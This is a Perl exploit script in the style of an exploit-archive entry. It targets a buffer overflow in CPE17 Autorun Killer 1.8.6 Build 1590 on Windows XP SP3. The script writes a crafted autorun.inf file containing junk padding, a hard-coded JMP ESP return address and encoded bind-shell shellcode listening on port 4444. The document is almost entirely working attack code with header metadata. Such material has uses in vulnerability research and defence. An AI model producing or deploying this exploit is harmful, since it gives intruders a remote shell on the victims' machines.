CPE17 Autorun Killer ASCII buffer overflow exploit that affects version 1.8.6 Build 1590.
45ab5709f7ce5a9b5b68d340ae0ccc07940d06d214a49b66c1a95d74abcfd8e6
>
> # Exploit Title: CPE17 Autorun Killer - ASCII Buffer Overflow Exploit
# Date: 01/10/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link:
http://download.thaiware.com/program15/cpe17antiautorun1590.rar
# Version: v.1.8.6 Build 1590
# Tested on: Windows XP SP3
# -------------------------------------------------------
# Bug found by Trackerx90
# -------------------------------------------------------
$file= "C:\\autorun.inf";
print "\n[+] Creating the evil file: $file...\n";
$junk = "\x41" x 500;
$ret = pack('V',0x7e49227c); # JMP ESP - Windows XP SP3 [user32.dll]
# windows/shell_bind_tcp
# PORT = 4444
$shellcode =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIkLjHoywpgpePsPK".
"9zEtqIBqtNkV2vPNkRr6lnksb4TnksBVHDOnWrjWV01io01YPnL5lPa1leRvLQ0O1HO".
"fmC18GM2xpF2bwlKPR20NkCrUlVaXPlKQPd8K5iPadBjC1zpf0nk78UHNkf8a0gqkcj".
"CWLbilKwDLKgqJveaIoUaYPLlYQZovms1hG4x9p1el4wsCMJXEkCM5tcEhbchlKchet".
"7qICRFNkvlpKlKV8WleQKcLKtDlKwqhPNiqT4dtdSkCk1q1I1JBqYo9p2xSoBznkeBx".
"klFCm3XvSebGpePcXqg1cgB1OpT58rlsGDfDG9oxU88Z05QWpePTiO4v4pPbHWYopbK".
"EP9oyE2p0PpPpPG0V0W0pPaxxj6oYOM0yoYEniZgua9K1C58grc0FqqLniZF1zDPcfR".
"w3XkrKktwU7io8UPSqGE8X7JIvXkOKOXUccCcv7rHD4JLwKkQkOzu67oyHGPhaePnrm".
"3QIoN5e83SRMU45PnizCbwBw1GvQJVqzr22y1FZBkM56Kw0DEtUlc1C1lMRd5t4PYVC".
"0aTSd2pQFv6RvW60VRnf60VCcBv0ht98LWOk6YokeLIKPpNf61VIoP0bHGxMWWmapkO".
"zumk8pNUlbPVphmvNuoMmMkON5elWvsLtJk0KK9pT5s5mkPGdSRRrO0jC0bsioXUAA";
$payload = $junk.$ret.$shellcode;
open($FILE,">$file") || die "[-] Error: $!\n";
print $FILE $payload;
close($FILE);
print "[+] The '$file' created successfully!\n";
--
mr.pr0n (@_pr0n_)
http://ghostinthelab.wordpress.com